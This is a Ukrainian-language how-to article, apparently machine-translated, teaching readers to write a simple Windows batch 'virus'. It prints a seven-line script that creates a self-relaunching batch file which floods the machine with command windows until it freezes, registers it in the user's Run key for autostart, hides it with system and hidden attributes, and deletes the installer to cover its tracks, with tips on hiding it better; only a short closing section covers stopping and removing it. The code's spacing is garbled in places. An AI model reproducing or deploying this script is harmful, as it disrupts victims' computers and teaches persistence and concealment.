1. Що таке .bat файл і як його створити?
2. Створюємо найпростіший вірус
3. Код створюваного вірусу
4. Сенс створеного вірусу
5. Як боротися з такими вірусами?
6. Як видалити такий вірус?

Створення найпростіших вірусів не вимагає наявності спеціальних середовищ для розробки програм. І особливих знань, до речі, теж. Створити віруси досить просто, якщо використовувати для цього командний рядок. Для цього потрібно небагато знати синтаксис командного рядка і вміти створювати .bat-файли.

Що таке .bat файл і як його створити?

Якщо дуже поверхнево, то це файли з розширенням .bat. Такі файли несуть в собі команди, які повинні бути виконані командним інтерпретатором Windows. Всі ті команди, які можна редагувати у вікні командного рядка, можна вписати в .bat файл і запустити. Результат буде однаковим.

Щоб створити .bat-вірус, нам потрібен звичайний текстовий редактор. В ідеалі підійде для цих цілей Блокнот. Створивши і відкривши новий текстовий документ, Вам потрібно вписати туди той код (команди), які він повинен виконати. Після цього, Вам потрібно за допомогою меню Зберегти як зберегти цей файл, задавши йому якесь ім'я з розширенням .bat і вказавши тип файлу Все файли.

Створюємо найпростіший вірус

У даній статті ми розглянемо створення вірусу, який після свого запуску буде нескінченно відкривати вікно командного рядка. Нескінченно і дуже швидко відкриваються вікна командного рядка не дадуть користувачеві спокійно працювати. Закрити їх всіх не встигне ніхто і дуже скоро вони заб'ють оперативну пам'ять комп'ютера, що в свою чергу сильно загальмує роботу комп'ютера, аж до повного зависання. Виглядати це буде приблизно так:

До того ж, ми закинемо наш вірус в автозавантаження, що забезпечить автоматичний запуск вірусу разом з операційною системою.

Код створюваного вірусу

Скільки програмістів, стільки різних рішень можна придумати для кожного завдання. Я приведу один зі своїх методів вирішення такого завдання.

[Code] md c: \ papka
echo start c: \ papka \ virus.bat> c: \ papka \ virus.bat
reg add HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Run / v virus /dc:\papka\virus.bat
attrib + r + h + s c: \ papka
attrib + r + h + s c: \ papka \ virus.bat
start c: \ papka \ virus.bat
del% 0 [/ code]

А тепер розберемо сам код. Перший рядок створює папку з ім'ям papka в корені диска C: /. Така адреса наведено тільки для прикладу. Використання ж кореня папки C: / не зовсім хороший варіант для вірусу. Якщо Ви хочете забезпечити хорошу виживаність Вашому вірусу, найкраще заховати його подалі. Першу команду можна навіть припустити, якщо Ви закине сам вірус в уже створену директорію.

Другий рядок створює файл c: \ papka \ virus.bat і, за допомогою команди echo, вписує в нього команду start c: \ papka \ virus.bat. Тут потрібно знати, що після знака> вказується місце виведення наведеної команди. Тут Вам потрібно познайомиться: c: \ papka \ virus.bat і є основне тіло вірусу. Створений нами .bat файл з кодом, який ми зараз розбираємо, є всього лише монтажником нашого основного вірусу. Ви можете використовувати іншу назву і інше місце розташування для вірусу.

Третій рядок закидає створений нами в другій сходинці тіло вірусу в автозавантаження. Для цього використовується для користувача гілка реєстру, так як до неї у користувача завжди є доступ. А ось використовувати автозагрузку комп'ютера небезпечно, так як користувач може не мати адміністративного доступу, що викличе непотрібну помилку.

Четверта і п'ята рядок коду змінюють атрибути вірусу і папки, де зберігається вірус. Даними командами, а для цього використовується команда attrib , Ми додаємо атрибути Тільки читання, Прихований і Системний і для папки, і для вірусу. Використання атрибута r (Тільки читання) необов'язково. А ось атрибути Прихований і Системний добре захистять створений нами вірус. Якщо не вірите, то почитайте статтю про вірус, який перетворює папки на флешці в ярлики . Він використовує саме цю технологію.

6-а строчка коду запускає наш вірус. Ви можете пропустити цей пункт, якщо хочете, щоб перший запуск вірусу стався тільки після перезавантаження комп'ютера.

І, нарешті, остання, 7-а строчка видаляє даний .bat-вірус. Це корисно, тому що з цього .bat-файлу можна спокійно вийти на створений нами вірус і видалити його.

Сенс створеного вірусу

Сенс вірусу, який вмістився в ці 7 рядків - створити основний вірус, захистити його і забезпечити його постійну роботу. А так же підмести свої сліди. А що робить основний вірус? Після запуску основного вірусу, він виконує ту команду, яка вписана в неї. А це команда, в свою чергу, запускає наш вірус, який знову-таки знову запускає самого себе. І так до нескінченності.

Як боротися з такими вірусами?

По-перше, початок боротьби з цим вірусом почнеться після того, як він запуститися. Дуже скоро вірус заповнить своїми копіями оперативну пам'ять і Ви навіть мишкою ворухнути не зможете. Тому, такий спектакль потрібно припиняти відразу. Для цього прекрасно підійде кнопка Break на клавіатурі. Тисніть її стільки, скільки знадобиться, щоб нові копії перестали створюватися. На клавіатурах без кнопки Break, може допомогти поєднання клавіш Ctrl + C.

Як видалити такий вірус?

Ви можете знайти і видалити вірус через його запис в автозавантаження (докладніше за посиланням). А так же Ви можете вийти на вірус по команді, яка буде висвітлюватися у вікні командного інтерпретатора. Природно, якщо Ви зможете дістатися до прихованого і системного файлу. Ось таким чином відбувається створення простого вірусу.

Успіхів!